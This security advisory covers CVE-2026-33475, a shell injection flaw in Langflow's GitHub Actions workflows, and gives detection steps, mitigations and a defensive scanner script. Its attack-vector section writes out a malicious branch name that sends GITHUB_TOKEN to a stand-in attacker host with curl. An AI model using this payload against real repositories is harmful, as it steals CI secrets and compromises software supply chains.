CVE-2026-33475 Overview
Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., ${{ github.head_ref }}) in run: steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., GITHUB_TOKEN), infrastructure manipulation, or supply chain compromise during CI/CD execution.
Critical Impact
Unauthenticated attackers can achieve remote code execution in CI/CD pipelines, potentially exfiltrating secrets, tampering with releases, or compromising the software supply chain.
Affected Products
- Langflow versions prior to 1.9.0
- GitHub Actions workflows in the .github/workflows/ directory
- GitHub Actions in the .github/actions/ directory
Discovery Timeline
- 2026-03-24 - CVE-2026-33475 published to NVD
- 2026-03-24 - Last updated in NVD database
Technical Details for CVE-2026-33475
Vulnerability Analysis
This vulnerability is classified as CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component), specifically manifesting as a shell injection vulnerability in GitHub Actions CI/CD workflows. The flaw enables unauthenticated remote code execution within the CI/CD environment, affecting any public fork of Langflow with GitHub Actions enabled.
The vulnerability allows attackers to inject and execute arbitrary shell commands during workflow execution. Successful exploitation can result in full access to CI secrets including GITHUB_TOKEN, the ability to push malicious tags or container images, tamper with software releases, or leak sensitive infrastructure data.
Root Cause
Several GitHub Actions workflows in .github/workflows/ and .github/actions/ reference GitHub context variables directly in run: shell commands without proper sanitization. Variables such as github.head_ref, github.event.pull_request.title, and custom inputs.* may contain user-controlled values and must be treated as untrusted input. Direct interpolation without proper quoting or sanitization leads to shell command injection.
The affected files in Langflow 1.3.4 include:
- .github/actions/install-playwright/action.yml
- .github/workflows/deploy-docs-draft.yml
- .github/workflows/docker-build.yml
- .github/workflows/release_nightly.yml
- .github/workflows/python_test.yml
- .github/workflows/typescript_test.yml
Attack Vector
The attack is executed remotely over the network by exploiting the CI/CD pipeline. An attacker can fork the Langflow repository, create a branch with a malicious name containing shell commands (e.g., injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN), and open a pull request to the main branch. When GitHub Actions runs the affected workflow, the unsanitized branch name is interpolated into the shell command, causing the injected commands to execute. This allows the attacker to exfiltrate CI secrets via external HTTP requests or perform other malicious actions within the CI environment.
Detection Methods for CVE-2026-33475
Indicators of Compromise
- Unusual outbound HTTP requests from GitHub Actions runners to unknown external domains
- Unexpected branch names containing shell metacharacters such as &&, |, ;, or backticks in pull request events
- CI/CD workflow logs showing execution of commands not defined in the workflow files
- Unauthorized releases, tags, or container image pushes to package registries
Detection Strategies
- Audit GitHub Actions workflow files for direct interpolation of user-controlled variables (e.g., ${{ github.head_ref }}, ${{ github.event.pull_request.title }}) in run: steps
- Monitor GitHub Actions workflow execution logs for anomalous command patterns or unexpected network activity
- Implement branch name validation policies that reject names containing shell metacharacters
- Review pull requests from forks for suspicious branch naming patterns before allowing workflow execution
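One way to run the first audit in the list above, as an added example (not code from the Langflow project or the advisory): a dependency-free Python scanner that flags the context expressions this page names when they appear inside a run: script. The sample workflow is constructed, and the line-based run: detection is a simplifying assumption that expects conventionally indented YAML.

```python
import re

# Context values this advisory names as attacker-controllable.
UNTRUSTED = re.compile(
    r"\$\{\{[^}]*?(github\.head_ref|github\.event\.pull_request\.title|inputs\.[\w-]+)"
)
# A `run:` key, optionally the first key of a step ("- run: ...").
RUN_KEY = re.compile(r"^\s*(?:-\s+)?(?P<key>run):\s*(?P<rest>.*)$")


def find_unsafe_interpolations(workflow_text):
    """Return [(line_number, expression)] for untrusted expressions in run: scripts."""
    findings = []
    run_col = None  # column of the active run: key; None when outside a script
    for lineno, line in enumerate(workflow_text.splitlines(), start=1):
        indent = len(line) - len(line.lstrip())
        if run_col is not None and (not line.strip() or indent > run_col):
            script = line  # continuation of a multi-line run: block
        else:
            m = RUN_KEY.match(line)
            run_col = m.start("key") if m else None
            if m is None:
                continue  # env:, with:, name: and so on are not shell input
            script = m.group("rest")
        findings += [(lineno, e.group(1)) for e in UNTRUSTED.finditer(script)]
    return findings


# Constructed sample workflow (not a file from the Langflow repository).
SAMPLE = """\
name: constructed-example
on: pull_request
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: unsafe, expression pasted into the script
        run: |
          echo "Testing ${{ github.head_ref }}"
          echo "Title: ${{ github.event.pull_request.title }}"
      - name: safe, value passed through env
        env:
          BRANCH_NAME: ${{ github.head_ref }}
        run: echo "Branch is: $BRANCH_NAME"
      - run: ./build.sh ${{ inputs.tag }}
"""

if __name__ == "__main__":
    for lineno, expr in find_unsafe_interpolations(SAMPLE):
        print(f"line {lineno}: ${{{{ {expr} }}}} is expanded inside a run: script")
```

The same expression under env: (line 13 of the sample) is not reported, because there the value reaches the shell as a variable rather than as script text.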
Monitoring Recommendations
- Enable GitHub Actions workflow audit logging and forward logs to a SIEM for analysis
- Set up alerts for outbound network connections from CI runners to non-allowlisted domains
- Monitor for unexpected changes to release artifacts, container images, or published packages
- Review GitHub repository settings to ensure proper workflow approval requirements for fork pull requests
How to Mitigate CVE-2026-33475
Immediate Actions Required
- Upgrade Langflow to version 1.9.0 or later, which contains the security patch
- Review and audit all GitHub Actions workflow files for unsafe variable interpolation patterns
- Enable workflow approval requirements for pull requests from repository forks
- Rotate any secrets that may have been exposed if exploitation is suspected
Patch Information
Version 1.9.0 of Langflow patches this vulnerability. For detailed information about the security fix, refer to the GitHub Security Advisory GHSA-87cc-65ph-2j4w.
Workarounds
- Refactor affected workflows to use environment variables instead of direct interpolation, wrapping values in double quotes
- Implement input validation for branch names and pull request titles before processing in workflows
- Restrict GitHub Actions from running on pull requests from forks until the patch is applied
- Apply the principle of least privilege to GITHUB_TOKEN permissions in workflow configurations
# Secure configuration example - use environment variables instead of direct interpolation
env:
  BRANCH_NAME: ${{ github.head_ref }}
run: |
  echo "Branch is: \"$BRANCH_NAME\""


